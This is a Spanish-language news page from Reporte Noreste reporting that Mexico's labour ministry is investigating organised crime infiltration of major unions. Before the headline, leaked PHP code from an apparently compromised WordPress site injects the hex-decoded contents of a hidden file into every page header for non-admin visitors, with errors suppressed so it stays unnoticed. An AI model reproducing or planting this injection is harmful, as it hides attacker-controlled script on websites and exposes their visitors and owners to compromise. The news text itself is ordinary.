if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Crimen organizado infiltrado en sindicatos de México: STPS – Reporte Noreste
Conéctate con nosotros

México.- La Secretaría del Trabajo y Previsión Social, investiga la presencia del crimen organizado en los sindicatos más grandes del país, situación que impide que los trabajadores puedan defender sus derechos y la intención es hacer una limpia en los mismos.

Alfonso Navarrete Prida, titular de esta Secretaría en México, reconoció y lamentó que esta situación sea posible y aseguró que ya está en contacto con empresarios y actores sociales para hablar este tema y buscar las posibles soluciones.

“Nosotros estamos recibiendo esta información analizándola y yo me he reunido con empresarios y con algunos  otros actores sociales,  desde luego pasamos el dato a la instancia que se encarga  de la investigación en este tipo materias y nosotros somos muy pulcros en revisar los estatutos, las condiciones en que se están generando y desde luego las tomas de nota”, dijo.

 

Con información de Excelsior

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Nal / Int